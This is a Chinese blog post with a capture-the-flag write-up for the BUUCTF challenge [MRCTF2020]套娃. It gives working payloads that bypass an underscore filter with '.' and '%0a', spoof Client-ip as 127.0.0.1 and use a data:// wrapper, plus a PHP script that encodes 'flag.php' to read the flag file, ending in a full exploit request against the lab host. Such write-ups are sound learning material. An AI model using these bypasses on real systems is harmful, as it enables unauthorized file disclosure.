BUUCTF [MRCTF2020]套娃

最新推荐文章于 2023-03-27 22:10:06 发布
最新推荐文章于 2023-03-27 22:10:06 发布
阅读量312 收藏 1
点赞数 2
分类专栏: ctfWP 文章标签: ctf buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20533167/article/details/119009928
版权

BUUCTF [MRCTF2020]套娃

 

  1.  !=  与!== 和== ===对应

  2. 1,http://localhost/aaa/ (打开aaa中的index.php)

    结果:

    $_SERVER['QUERY_STRING'] = "";

    $_SERVER['REQUEST_URI']  = "/aaa/";

    $_SERVER['SCRIPT_NAME']  = "/aaa/index.php";

    $_SERVER['PHP_SELF']     = "/aaa/index.php";

    2,http://localhost/aaa/?p=222 (附带查询)

    结果:

    $_SERVER['QUERY_STRING'] = "p=222";

    $_SERVER['REQUEST_URI']  = "/aaa/?p=222";

    $_SERVER['SCRIPT_NAME']  = "/aaa/index.php";

    $_SERVER['PHP_SELF']     = "/aaa/index.php";

    3,http://localhost/aaa/index.php?p=222&q=333

    结果:

    $_SERVER['QUERY_STRING'] = "p=222&q=333";

    $_SERVER['REQUEST_URI']  = "/aaa/index.php?p=222&q=333";

    $_SERVER['SCRIPT_NAME']  = "/aaa/index.php";

    $_SERVER['PHP_SELF']     = "/aaa/index.php";

    由实例可知:

    $_SERVER["QUERY_STRING"]  获取查询 语句,实例中可知,获取的是?后面的值

    $_SERVER["REQUEST_URI"]   获取 http://localhost 后面的值,包括/

    $_SERVER["SCRIPT_NAME"]   **当前脚本的路径,如:index.php

    $_SERVER["PHP_SELF"]      当前正在执行脚本的文件名

  3. _的过滤 可以用 . 绕过

  4. %0a绕过正则

所以第一部分的payload: http://4bc5cdd7-d701-4c49-b9a7-d9368f0abd98.node4.buuoj.cn/?b.u.p.t=23333%0a

 

 

页面源码有一个jsfuck的

 

 

 

先看一下jsfuck

 

还是Merak

error_reporting(0);

include 'takeip.php';

ini_set('open_basedir','.');

include 'flag.php';





if(isset($_POST['Merak'])){

    highlight_file(__FILE__);

    die();

}





function change($v){

    $v = base64_decode($v);                        1.base64解$v

    $re = '';

    for($i=0;$i<strlen($v);$i++){

        $re .= chr ( ord ($v[$i]) + $i*2 );           2.$v的每一个字母的ascii加上2*i再转换为此时值对应的ascii字符 然后与之前的$re拼接

    }

    return $re;

}

echo 'Local access only!'."<br/>";

$ip = getIp();                   这个函数用的一般只有XFF和Client-ip这两种方法

if($ip!='127.0.0.1')             要求必须ip为127.0.0.1

echo "Sorry,you don't have permission!  Your ip is :".$ip;

if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' 可以使用data:// 来进行转换){

echo "Your REQUEST is:".change($_GET['file']);

echo file_get_contents(change($_GET['file'])); }

?>

 

file_get_contents($_GET['2333']) === 'todat is a happy day'可以通过这个方法

参考:https://www.php.cn/manual/view/285.html

data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=

 

根据change函数写个生成payload的脚本

<?php

    

function change($v){

    $v = base64_decode($v);                              

    $re = '';

    for($i=0;$i<strlen($v);$i++){

        $re .= chr ( ord ($v[$i]) + $i*2 );              

    }

    return $re;

}





function changeRE($v){

    /*生成可以转为正常payload的函数

    */

    $re='';

    for($i=0;$i<strlen($v);$i++){

        $re .= chr ( ord ($v[$i]) - $i*2 );

    }

    return $re;

}





echo(base64_encode(changeRE('flag.php')));





?>

 

注意:这里的两个参数都是通过get参数传的,我用post传了好几次才发现

file=ZmpdYSZmXGI=

最终的payload:

POST /secrettw.php?2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI= HTTP/1.1

Host: 4bc5cdd7-d701-4c49-b9a7-d9368f0abd98.node4.buuoj.cn

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Cache: no-cache

Origin: moz-extension://56944923-d8f9-4d5b-b169-ab8dceb2eced

Connection: close

Client-ip: 127.0.0.1

 

这三个参数是修改的

 

4pri1
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 425
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
buuctf-web-[MRCTF2020]套娃
weixin_46079186的博客
07-23 215
打开题目,查看源代码 $query = $_SERVER['QUERY_STRING']; # 查询(query)的字符串(URL 中第一个问号 ? 之后的内容)。 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); # substr_count 计算出现的次数,这里计算$query,出现_的次数%5f 也是_ 这里不能等于0.
[MRCTF2020]套娃
Sk1y的博客
07-20 2132
[MRCTF2020]套娃 考查知识点:本题三重套娃,考查的知识包括绕过过滤,空格代替_,传值方式,写代码的能力等等。 文章目录[MRCTF2020]套娃第一层套娃第二层套娃第三层套娃参考链接 第一层套娃 在f12中可以发现这个线索 <?php $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){//即不能存在_,这里用%5f url
俄罗斯套娃程序及设计
06-09
2.在递归函数调用时记录路经(保存在向量path_now中),并记录当前的套娃总重(score_now)。 3.走过的没有套娃的路口,将其值修改为HPZD(即0XFFFFFFFF),表明该路口已走过。 4.当递归函数返回时恢复path_now和score...
俄罗斯套娃奖品Java程序
08-12
网上有套娃的VC程序,c程序,这是我改写的Java版本。
俄罗斯套娃奖品C++程序
05-19
非常经典的程序,曾是中兴“捧月杯”参赛程序。程序里面使用使用C++编程
俄罗斯套娃
04-17
俄罗斯套娃动作数据
俄罗斯套娃问题 回溯法
08-01
俄罗斯套娃问题 采用递归、回溯法解决俄罗斯套娃问题
BUUCTF--[MRCTF2020]套娃
二狗的博客
03-27 190
打开靶机:查看源码发现第一个if判断传参的字符串,不能有_和%5f绕过:PHP会将传参中的空格( )、小数点(.)自动替换成下划线第二个if判断get传参b_u_p_t不等于23333 并且开头和结尾和中间必须是23333绕过:在23333结尾加个换行符url编码为%0a 即可绕过,发现进入得查看原码发现解码得随便用POST方法给Merak一个值发现代码1、来源ip是127.0.0.1 用2、get参数2333传来的值,使用文件流打开后内容为。
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
weixin_44632787的博客
06-27 731
BUUCTF之[MRCTF2020]套娃 题目 发现什么都没有,于是鼠标右键查看一下提示。 可以看到PHP代码 <?php //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &
审计练习16——[MRCTF2020]套娃
qq_43756333的博客
06-12 419
平台:buuoj.cn 打开靶机源码处php代码 第一个if如果传入的参数出现_和它的url编码%5f,则打印Y0u are So cutE! 绕过:用.或空格代替_ 第二个if要b_u_r_t的值为23333但添加了正则匹配,用^和$来界定23333的首尾,代表了“行的开头和结尾”,只匹配一行,因此%0a换行绕过 打开secrettw.php 提示本地,xff不行,用client-ip 下面的jsfuck代码直接控制台输出 那么就post一个Merak随便传个值 回显php,代码如下 <?
BUUCTF [BJDCTF2020]EzPHP1详解
Aiwin的博客
05-14 1288
BUUCTF [BJDCTF2020]EzPHP1包含的知识与详解
ctf】文件备份和md5函数数组绕过
chualam的博客
11-04 640
<? include_once “flag.php”; ini_set(“display_errors”, 0); $str = strstr($_SERVER[‘REQUEST_URI’], ‘?’); $str = substr($str,1); $str = str_replace(‘key’,”,$str); parse_str($str); echo md5($key1); echo md5($key2); if(md5($key1) == md5($key2) && $
CTF解题-Bugku_Web_WriteUp (上)
道阻且长,行则将至。
08-16 8714
BugkuCTF平台是免费的CTF训练平台,题目数量多网上解析全面对新手入门友好。 为了划水“强网杯”练习一下,先从Web部分下手…… N0.1 Web2 1、访问靶场链接,花里胡哨: 2、入门题,直接查看搜索源码: 3、解决: No.2 计算器 额,这题……没啥好所说的,原先限制前端字段输入长度为1,修改前端字段长度的限制即可: No.3 Web$_GET 1、看看解题链接: 2、看到这没啥好说的……该提示的都提示了,直接获取 flag: No.4 Web$_POST 1、看看解题链接:
CTF-代码审计(2)
weixin_30258027的博客
06-16 411
1.bugku 备份是个好习惯 网址:http://123.206.87.240:8002/web16/ 进去什么都没有,题目说备份想到备份文件,所以直接再后面加个 .bak 拿到源码: <?php/** * Created by PhpStorm. * User: Norse * Date: 2017/8/6 * Time: 20:22*/...
parse_url小结
weixin_30305735的博客
07-05 634
本篇文章对parse_url进行一个小结 0x01:parse_url $url = "/baidu.com:80"; $url1 = "/baidu.com:80a"; $url2 = "//pupiles.com/about:1234"; $url3 = "//baidu.com:80a"; var_dump(parse_url($url)); var_dump(pa...
俄罗斯套娃c语言程序
最新发布
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值